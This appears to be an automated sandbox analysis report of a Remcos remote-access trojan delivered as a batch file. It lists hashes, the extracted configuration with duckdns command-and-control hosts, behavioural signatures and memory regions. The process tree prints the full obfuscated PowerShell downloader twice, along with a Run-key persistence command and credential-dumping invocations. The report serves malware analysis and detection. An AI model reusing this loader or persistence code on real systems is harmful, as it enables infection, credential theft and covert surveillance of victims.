Resubmissions

31/03/2025, 15:20

250331-sqqlbavny7 10

31/03/2025, 15:11

250331-skqdcsvmz2 10

Analysis

  • max time kernel
    119s
  • max time network
    109s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250313-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31/03/2025, 15:20

General

  • Target

    2025.02.222 n.ts შპს განსხვავებული.bat

  • Size

    3KB

  • MD5

    1db91aace1aac9f3e07036598aeaa98b

  • SHA1

    c8f4074759f0ea7eef262c36163db7868c6503f7

  • SHA256

    3d5032b506dcc1626efecbebb7f97ff8539200b6090fffa96ef6090d7082d249

  • SHA512

    9f5e409c1d48c3fddb13085949a4141962000fcf45614cf6feff841d6331adec33cfd95d9836761436e6fed4b87136d730396da9ac89c065fe76f264b5d98de4

Malware Config

Extracted

Family

remcos

Botnet

Sending

C2

jamourtg6hansit1.duckdns.org:3980

jamourtg6hansit1.duckdns.org:3981

jamourtg6hansit2.duckdns.org:3980

jamourtg6hansit3.duckdns.org:3980

jamourtg6hansit4.duckdns.org:3980

jamourtg6hansit5.duckdns.org:3980

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    hjlbtisot.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    kmportsrgsd-ZX0BIK

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Detected Nirsoft tools 4 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 2 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Network Service Discovery 1 TTPs 1 IoCs

    Attempt to gather information on host's network.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2025.02.222 n.ts შპს განსხვავებული.bat" bcdedit /c set delete /r readonly /f force /t 2
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1596
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "Get-Service;$Offshore='func';Get-History;$Offshore+='t';Get-History;$Offshore+='i';$trkrudens=Get-History;$Offshore+='on:';(ni -p $Offshore -n Harpendes -value { param($Ventepositionen);$Tropikfronternes=1;do {$Intellekt185+=$Ventepositionen[$Tropikfronternes];$Tropikfronternes+=2} until(!$Ventepositionen[$Tropikfronternes])$Intellekt185});(ni -p $Offshore -n Metabolisms -value {param($Sandwichs);.($Forbrugsforeningernes) ($Sandwichs)});ConvertTo-Html;$photophone=Harpendes ' n e T .,w';$photophone+=Harpendes '.EPbucTl iBE NCt';$Overhngets=Harpendes ' M oEzOi l l a /';$Tradeswomen=Harpendes ' T lBsD1 2';$Folkeregistrets='S[,NIe t,. s e RMvkI cCe p oNi N TaM.AEN.a G e r ]S: : S e cOU.RmI tmyFpBR oTT oCC o.LA=L$ T R aHd.Ecs w o M eFN';$Overhngets+=Harpendes ',5U.,0S H(SW i.nHdPoAwFsD FNGTB 1 0D.V0C; VW iBn 6a4 ; x 6N4.;K ,rTvS:,1C3 4A.B0 ) G e c k,o /U2A0C1 0 0U1A0K1 PFMibrPe,f oMx / 1 3B4 .c0';$Fails=Harpendes '.uHsSeAR -FA G ESN.T';$velkendtes=Harpendes ' hGt t pAsS:B/ / a fTlSa c l,t dD.GtGotp / L yhc.iFnUeD.Ml zPh';$Shippingelev=Harpendes ' >';$Forbrugsforeningernes=Harpendes 'IIDELX';$Brndborerens='Hjlpemotorernes';$Smrrebrdssedlernes='\Epikureres.Sup';Metabolisms (Harpendes 'Z$CG lSO b,a,l : BGE k eFn D,E lTs EVSFs KARdI,f t E r,sT=R$OE n,V : AHpFpEDMa TbAR+,$SS,mVR rOEPBPr.dPS SIEDd l EVr N.e.S');Metabolisms (Harpendes 'M$ G lOOEB aBLD:FSTQSU IATK=B$ vSe,LNK ePN DNtdE s .vs,PclgiKt (M$ S h i PMPSIMnSg,e LPEVVU)');Metabolisms (Harpendes $Folkeregistrets);$velkendtes=$Squit[0];$Arbejdsregler=(Harpendes ' $ GBl.oSb a,Lc:Gd E f L e cMTVi.O nKIKS,EPs.2F0 =KnUECWE-mOBb jAe,CstE UsSY S.t EPM,. $AP.h O T o,P,H,O n E');Metabolisms ($Arbejdsregler);Metabolisms (Harpendes 'A$HDUesfol.eTcdt,iBo nSiMsBers 2K0S. HZeLaFd eJrSsJ[t$ FLaPi lGsR],= $BO v e rRh nTgNeMtUs');$Botcherly=Harpendes ' $ DTe.f lbe cetAi oPn i sFe sE2S0D.BDPoSwLnAl,o a d FBiClCeF(P$Pv e,l k e n d tAeIsK,C$sF eNtFt iKc u.s )';$Fetticus=$Bekendelsesskrifters;Metabolisms (Harpendes 's$HG L,o b a lP:BDPy S mCO RhFCITS TFiRS Ku= (MT ETSAT,- P A TAH $ FpEStKtOi.C u,sA)');while (!$Dysmorfistisk) {Metabolisms (Harpendes 'R$TgDlKoTbFa l :TKDe e sMh.oPn dLs.=H$ S kGaSr nPsCuNn g eprTn e') ;Metabolisms $Botcherly;Metabolisms (Harpendes 'g[ T h rBE a D i,NCg .ST HXr E a.dN]P: :PsGLTe e P,(K4A0 0 0 )');Metabolisms (Harpendes 'R$ GSL,OGbCa lA:Sd ySsSMCO,RPfOI.sst IUSFkP= (STOE S t,-FPHATtOHA D$,fFE t t iNC uTs )') ;Metabolisms (Harpendes ',$ g lao b A l : N.iVG hGt s =,$fgBlNoEbPAUl.: O,pSdSAbt EErMIKnKGKs S.IKd E r NCEKs + + % $SSWQSUUIUtT..C o uFNST') ;$velkendtes=$Squit[$nights]}$Floristics=404568;$Excruciates=26946;Metabolisms (Harpendes ' $ gFl,O B A,LS:BtSoDd d YSS KSeBeIR nteRs =. GMEAt -SCEO n.tKE N TA $,fRE,t T i c U s');Metabolisms (Harpendes ' $,gslHo b a l :ROLgSe org,r.aap hDi cHaBlBl yK =F O[VSKyTs t eTm . C oknUv e r t ] :.:OF r o mSBUaSsMeA6B4NS t r iBn gd(A$PT o d d y s,keeFe.r nAe s,)');Metabolisms (Harpendes 'P$ gSlAo b A l : K l.aBGGe T. = P[CS Y S tMe mS.St EFX t .SE n cNo D i.nUG.]L:S:,A SKC IMIS.,GbEptPS t.R,i.N Gm(,$.OBG e,oAG r a P,HSitc,a L l y )');Metabolisms (Harpendes 'A$ GFl.opbAa,L.: NkU MmmFEUr E R e =A$WK lAaJGAE.tH..SOUVbSs t RKI n,gP(k$ FcLwOPr iUSNtPiCC.sD,,$LEBXSC RAUEcOI aATSe s )');Metabolisms $Nummerere;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5904
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Get-Service;$Offshore='func';Get-History;$Offshore+='t';Get-History;$Offshore+='i';$trkrudens=Get-History;$Offshore+='on:';(ni -p $Offshore -n Harpendes -value { param($Ventepositionen);$Tropikfronternes=1;do {$Intellekt185+=$Ventepositionen[$Tropikfronternes];$Tropikfronternes+=2} until(!$Ventepositionen[$Tropikfronternes])$Intellekt185});(ni -p $Offshore -n Metabolisms -value {param($Sandwichs);.($Forbrugsforeningernes) ($Sandwichs)});ConvertTo-Html;$photophone=Harpendes ' n e T .,w';$photophone+=Harpendes '.EPbucTl iBE NCt';$Overhngets=Harpendes ' M oEzOi l l a /';$Tradeswomen=Harpendes ' T lBsD1 2';$Folkeregistrets='S[,NIe t,. s e RMvkI cCe p oNi N TaM.AEN.a G e r ]S: : S e cOU.RmI tmyFpBR oTT oCC o.LA=L$ T R aHd.Ecs w o M eFN';$Overhngets+=Harpendes ',5U.,0S H(SW i.nHdPoAwFsD FNGTB 1 0D.V0C; VW iBn 6a4 ; x 6N4.;K ,rTvS:,1C3 4A.B0 ) G e c k,o /U2A0C1 0 0U1A0K1 PFMibrPe,f oMx / 1 3B4 .c0';$Fails=Harpendes '.uHsSeAR -FA G ESN.T';$velkendtes=Harpendes ' hGt t pAsS:B/ / a fTlSa c l,t dD.GtGotp / L yhc.iFnUeD.Ml zPh';$Shippingelev=Harpendes ' >';$Forbrugsforeningernes=Harpendes 'IIDELX';$Brndborerens='Hjlpemotorernes';$Smrrebrdssedlernes='\Epikureres.Sup';Metabolisms (Harpendes 'Z$CG lSO b,a,l : BGE k eFn D,E lTs EVSFs KARdI,f t E r,sT=R$OE n,V : AHpFpEDMa TbAR+,$SS,mVR rOEPBPr.dPS SIEDd l EVr N.e.S');Metabolisms (Harpendes 'M$ G lOOEB aBLD:FSTQSU IATK=B$ vSe,LNK ePN DNtdE s .vs,PclgiKt (M$ S h i PMPSIMnSg,e LPEVVU)');Metabolisms (Harpendes $Folkeregistrets);$velkendtes=$Squit[0];$Arbejdsregler=(Harpendes ' $ GBl.oSb a,Lc:Gd E f L e cMTVi.O nKIKS,EPs.2F0 =KnUECWE-mOBb jAe,CstE UsSY S.t EPM,. $AP.h O T o,P,H,O n E');Metabolisms ($Arbejdsregler);Metabolisms (Harpendes 'A$HDUesfol.eTcdt,iBo nSiMsBers 2K0S. HZeLaFd eJrSsJ[t$ FLaPi lGsR],= $BO v e rRh nTgNeMtUs');$Botcherly=Harpendes ' $ DTe.f lbe cetAi oPn i sFe sE2S0D.BDPoSwLnAl,o a d FBiClCeF(P$Pv e,l k e n d tAeIsK,C$sF eNtFt iKc u.s )';$Fetticus=$Bekendelsesskrifters;Metabolisms (Harpendes 's$HG L,o b a lP:BDPy S mCO RhFCITS TFiRS Ku= (MT ETSAT,- P A TAH $ FpEStKtOi.C u,sA)');while (!$Dysmorfistisk) {Metabolisms (Harpendes 'R$TgDlKoTbFa l :TKDe e sMh.oPn dLs.=H$ S kGaSr nPsCuNn g eprTn e') ;Metabolisms $Botcherly;Metabolisms (Harpendes 'g[ T h rBE a D i,NCg .ST HXr E a.dN]P: :PsGLTe e P,(K4A0 0 0 )');Metabolisms (Harpendes 'R$ GSL,OGbCa lA:Sd ySsSMCO,RPfOI.sst IUSFkP= (STOE S t,-FPHATtOHA D$,fFE t t iNC uTs )') ;Metabolisms (Harpendes ',$ g lao b A l : N.iVG hGt s =,$fgBlNoEbPAUl.: O,pSdSAbt EErMIKnKGKs S.IKd E r NCEKs + + % $SSWQSUUIUtT..C o uFNST') ;$velkendtes=$Squit[$nights]}$Floristics=404568;$Excruciates=26946;Metabolisms (Harpendes ' $ gFl,O B A,LS:BtSoDd d YSS KSeBeIR nteRs =. GMEAt -SCEO n.tKE N TA $,fRE,t T i c U s');Metabolisms (Harpendes ' $,gslHo b a l :ROLgSe org,r.aap hDi cHaBlBl yK =F O[VSKyTs t eTm . C oknUv e r t ] :.:OF r o mSBUaSsMeA6B4NS t r iBn gd(A$PT o d d y s,keeFe.r nAe s,)');Metabolisms (Harpendes 'P$ gSlAo b A l : K l.aBGGe T. = P[CS Y S tMe mS.St EFX t .SE n cNo D i.nUG.]L:S:,A SKC IMIS.,GbEptPS t.R,i.N Gm(,$.OBG e,oAG r a P,HSitc,a L l y )');Metabolisms (Harpendes 'A$ GFl.opbAa,L.: NkU MmmFEUr E R e =A$WK lAaJGAE.tH..SOUVbSs t RKI n,gP(k$ FcLwOPr iUSNtPiCC.sD,,$LEBXSC RAUEcOI aATSe s )');Metabolisms $Nummerere;"
    1⤵
    • Network Service Discovery
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3484
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:684
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Entrochus" /t REG_EXPAND_SZ /d "%Reimburses% -windowstyle 1 $Frynsernes143=(gi 'HKCU:\Software\Forlydes\').GetValue('coxswains');%Reimburses% ($Frynsernes143)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2700
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Entrochus" /t REG_EXPAND_SZ /d "%Reimburses% -windowstyle 1 $Frynsernes143=(gi 'HKCU:\Software\Forlydes\').GetValue('coxswains');%Reimburses% ($Frynsernes143)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:3060
      • C:\Windows\SysWOW64\recover.exe
        C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\nscrjpuseqhqhnbhaylxjx"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:5848
      • C:\Windows\SysWOW64\recover.exe
        C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\xmhbkhflayzvrtpljiyzukljj"
        3⤵
        • Accesses Microsoft Outlook accounts
        • System Location Discovery: System Language Discovery
        PID:4044
      • C:\Windows\SysWOW64\recover.exe
        C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\aouukapnnhriuilpbtkafpyasztf"
        3⤵
          PID:5544
        • C:\Windows\SysWOW64\recover.exe
          C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\aouukapnnhriuilpbtkafpyasztf"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:656

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      167549d428c8639f7fd4e74e015cf15c

      SHA1

      3aad86a96a1f5be662d2f1e0ae163be3aadbbed3

      SHA256

      dc8fc1d706f11bcceadbdd29b6fe466b955369e2b1237367952ada4f40696f33

      SHA512

      b84f09252dab74b4fce6c231dc02e0d529d7794aafaccc93540f771b5e97bb33e2ab149b61f6f3c67b653731e139cf727db82b3f30e27dbd5e5bbfcd970096df

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x4hewr4z.kjl.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\nscrjpuseqhqhnbhaylxjx

      Filesize

      4KB

      MD5

      ba3d01ab9cfce4601fa1862582597bd5

      SHA1

      db2ab6b2568176b3a1ec78ca7a9df71a08959538

      SHA256

      e79f55fbd37cf82b8968653ce63053d34dae0140773587336a540c7edb0b08eb

      SHA512

      93d5bda703a39d0ef10b6b6136461a8f4e85aeb1c7b7260183fb2d20da17fefe7b4c4b189a7e0f4cf19f673c43ef2981e2795197f6ba9a47a13d64855744cb58

    • C:\Users\Admin\AppData\Roaming\Epikureres.Sup

      Filesize

      561KB

      MD5

      fe566224082e2fd8765e323a73a2d9f2

      SHA1

      86a2fd4c14b36fc636efdfa6713ba3a3ae149937

      SHA256

      52de732643d3945e5e12154ea8dd7f8643419e5432b8ee9059c32c250532f772

      SHA512

      2c7c37d9c1cebc9915b082e0db60a41b8afffba7d6e35c115fa2ee98a0ac3f7fc28b5e55f019da852d4a7597644f0587fa370233f59101d37e7db303f06c4886

    • memory/656-83-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/656-84-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/656-82-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/684-90-0x0000000022AC0000-0x0000000022AD9000-memory.dmp

      Filesize

      100KB

    • memory/684-91-0x0000000022AC0000-0x0000000022AD9000-memory.dmp

      Filesize

      100KB

    • memory/684-87-0x0000000022AC0000-0x0000000022AD9000-memory.dmp

      Filesize

      100KB

    • memory/684-68-0x0000000000E00000-0x0000000002054000-memory.dmp

      Filesize

      18.3MB

    • memory/3484-51-0x0000000074540000-0x0000000074CF0000-memory.dmp

      Filesize

      7.7MB

    • memory/3484-57-0x0000000074540000-0x0000000074CF0000-memory.dmp

      Filesize

      7.7MB

    • memory/3484-36-0x0000000006360000-0x00000000066B4000-memory.dmp

      Filesize

      3.3MB

    • memory/3484-29-0x00000000061D0000-0x0000000006236000-memory.dmp

      Filesize

      408KB

    • memory/3484-42-0x0000000006960000-0x000000000697E000-memory.dmp

      Filesize

      120KB

    • memory/3484-43-0x0000000006980000-0x00000000069CC000-memory.dmp

      Filesize

      304KB

    • memory/3484-44-0x0000000007940000-0x00000000079D6000-memory.dmp

      Filesize

      600KB

    • memory/3484-45-0x0000000006E60000-0x0000000006E7A000-memory.dmp

      Filesize

      104KB

    • memory/3484-46-0x0000000006EB0000-0x0000000006ED2000-memory.dmp

      Filesize

      136KB

    • memory/3484-47-0x0000000007FD0000-0x0000000008574000-memory.dmp

      Filesize

      5.6MB

    • memory/3484-48-0x0000000008C00000-0x000000000927A000-memory.dmp

      Filesize

      6.5MB

    • memory/3484-28-0x00000000059A0000-0x00000000059C2000-memory.dmp

      Filesize

      136KB

    • memory/3484-50-0x0000000074540000-0x0000000074CF0000-memory.dmp

      Filesize

      7.7MB

    • memory/3484-27-0x0000000074540000-0x0000000074CF0000-memory.dmp

      Filesize

      7.7MB

    • memory/3484-52-0x0000000074540000-0x0000000074CF0000-memory.dmp

      Filesize

      7.7MB

    • memory/3484-53-0x000000007454E000-0x000000007454F000-memory.dmp

      Filesize

      4KB

    • memory/3484-54-0x0000000074540000-0x0000000074CF0000-memory.dmp

      Filesize

      7.7MB

    • memory/3484-55-0x0000000074540000-0x0000000074CF0000-memory.dmp

      Filesize

      7.7MB

    • memory/3484-56-0x0000000009280000-0x000000000D4B4000-memory.dmp

      Filesize

      66.2MB

    • memory/3484-30-0x00000000062B0000-0x0000000006316000-memory.dmp

      Filesize

      408KB

    • memory/3484-58-0x0000000074540000-0x0000000074CF0000-memory.dmp

      Filesize

      7.7MB

    • memory/3484-60-0x0000000074540000-0x0000000074CF0000-memory.dmp

      Filesize

      7.7MB

    • memory/3484-61-0x0000000074540000-0x0000000074CF0000-memory.dmp

      Filesize

      7.7MB

    • memory/3484-23-0x000000007454E000-0x000000007454F000-memory.dmp

      Filesize

      4KB

    • memory/3484-24-0x0000000003050000-0x0000000003086000-memory.dmp

      Filesize

      216KB

    • memory/3484-25-0x0000000074540000-0x0000000074CF0000-memory.dmp

      Filesize

      7.7MB

    • memory/3484-26-0x0000000005B30000-0x0000000006158000-memory.dmp

      Filesize

      6.2MB

    • memory/4044-77-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/4044-78-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/4044-75-0x0000000000400000-0x0000000000462000-memory.dmp

      Filesize

      392KB

    • memory/5848-74-0x0000000000400000-0x000000000047D000-memory.dmp

      Filesize

      500KB

    • memory/5848-76-0x0000000000400000-0x000000000047D000-memory.dmp

      Filesize

      500KB

    • memory/5904-12-0x000001322AC00000-0x000001322AC22000-memory.dmp

      Filesize

      136KB

    • memory/5904-2-0x00007FFD7B2D3000-0x00007FFD7B2D5000-memory.dmp

      Filesize

      8KB

    • memory/5904-13-0x00007FFD7B2D0000-0x00007FFD7BD91000-memory.dmp

      Filesize

      10.8MB

    • memory/5904-14-0x00007FFD7B2D0000-0x00007FFD7BD91000-memory.dmp

      Filesize

      10.8MB

    • memory/5904-17-0x00007FFD7B2D0000-0x00007FFD7BD91000-memory.dmp

      Filesize

      10.8MB

    • memory/5904-18-0x00007FFD7B2D3000-0x00007FFD7B2D5000-memory.dmp

      Filesize

      8KB

    • memory/5904-19-0x00007FFD7B2D0000-0x00007FFD7BD91000-memory.dmp

      Filesize

      10.8MB

    • memory/5904-22-0x00007FFD7B2D0000-0x00007FFD7BD91000-memory.dmp

      Filesize

      10.8MB